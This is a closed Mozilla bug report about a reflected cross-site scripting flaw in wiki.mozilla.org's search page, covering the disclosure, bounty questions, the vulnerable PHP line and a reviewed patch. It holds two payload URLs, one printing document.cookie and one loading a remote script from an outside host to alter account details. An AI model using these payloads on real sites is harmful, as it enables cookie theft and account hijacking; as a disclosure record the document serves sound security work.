Closed Bug 714540 Opened 10 years ago Closed 10 years ago

Cross site scripting(XSS) in https://wiki.mozilla.org

Categories

(Websites :: wiki.mozilla.org, defect)

defect
Not set
critical

Tracking

(Not tracked)

VERIFIED FIXED

People

(Reporter: netfuzzerr, Assigned: wenzel)

References

()

Details

(Keywords: wsec-xss, Whiteboard: [infrasec:xss][ws:high])

Attachments

(2 files)

User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7

Steps to reproduce:

Hello,

I found a vulnerability Cross Site Scripting in https://wiki.mozilla.org. The vulnerability results because the research is not correct encoding, thus allowing an attacker to attack Cross Site Scripting, and possibly pledging the account of the victim to visit a specially crafted link. Exploration for the attacker must convince the User logged in to visit the page with a link specially created exploiting this flaw and stealing the victim's cookies.

Reproduce:
1. Log in https://wiki.mozilla.org.
2. Now, go to https://wiki.mozilla.org/Special:Search?search=sssssssssssssss%22%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&x=23&y=8
3. See your cookies.

this vulnerability may be eligible for a reward?

Regards,
Mario
Severity: normal → critical
Thank you for reporting this issue to us. We'll investigate the issue and 
provide feedback within the bug. No additional action is needed from you 
at this time. If you have questions or additional information please add 
that info to the bug.

Thanks,
mgoodwin
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [infrasec:xss][ws:high]
Duplicate of this bug: 715042
Only, for confirm a possible attack. I'm attaching a exploit for this vulnerability, he exploit the vulnerability and change user informations doing a CSRF attack.

Reproduce:
1. Log in wiki.mozilla.org
2. Open this https://wiki.mozilla.org/Special:Search?search=%22%3E%3Cscript%20src=http://fuzzgooglecode.googlecode.com/files/xssexploit%282%29.js%3E%3C/script%3E
3. Wait...
4. See your account, changed.
Attached file Exploit demonstration.
I wonder if this vulnerability may be eligible for a reward?
It seems that Mozilla is ignoring this flaw, it's been two weeks, no correction, no response. No reason for this failure to keep private. Mozilla is forcing me to make this flaw public. You will not fix this flaw?
It seems the issue here is with the gmo skin.

The offending line is 353 of gmo.php:
                echo "&nbsp;&raquo;&nbsp;<a href=\"$item_url\"> Search: " . $search_params['search'] . "</a>";

Any user supplied input should be correctly output encoded prior to being written. See https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines#Preventing_XSS for more info.
Assignee: nobody → milos
(In reply to Mario Gomes from comment #5)
> I wonder if this vulnerability may be eligible for a reward?

Mario, this particular site is not on the bounty list and is not eligible for the bounty program.  The list of sites that do qualify can be found here : http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs

However, we do still appreciate you filing this issue and we'll work to address it.
In the post about bug bounty, Mozilla also said that will also pay for security bugs in websites not listed. But, seems the bug need be "ws:critical". This is right?
in the post, Mozilla also said that will pay also for reports in not listed. But, seems only pay for bugs "ws:critical"?
(In reply to Mario Gomes from comment #11)
> in the post, Mozilla also said that will pay also for reports in not listed.
> But, seems only pay for bugs "ws:critical"?

Correct, we sometimes pay bounties for exceptional security issues in other sites that were not listed within the bounty scope. WS:critical would be a minimum requirement, but would not guarantee a bounty payment. We would need to evaluate the specific issue on a case by case basis.
Okay. I will try find it. Only a doubt, why Mozilla here https://wiki.mozilla.org/WebAppSec/Web_App_Severity_Ratings put CSRF more critical than XSS(reflected), if with a XSS I can do CSRF attacks(see comment 3). 

For exemple: the bug 620397. The CSRF can change the user informations, but if i have a XSS Reflected I can do this easy(bypassing the security tokens).
Attached patch Possible patchSplinter Review
This should fix the issue. Sadly, I don't have an instance of Mediawiki handy, so can someone try this out please?
Attachment #591185 - Flags: review?(milos)
Attachment #591185 - Flags: feedback?(nmaul)
Comment on attachment 591185 [details] [diff] [review]
Possible patch

Review of attachment 591185 [details] [diff] [review]:
-----------------------------------------------------------------

Looks good, thanks Fred.

Jake: please push this to prod, thanks.
Attachment #591185 - Flags: review?(milos) → review+
Landed: r100350. Will file a bug to get this pushed.
Assignee: milos → fwenzel
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Blocks: 720966
Thanks
Status: RESOLVED → VERIFIED
Attachment #591185 - Flags: feedback?(nmaul) → feedback+
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
Group: websites-security
You need to log in before you can comment on or make changes to this bug.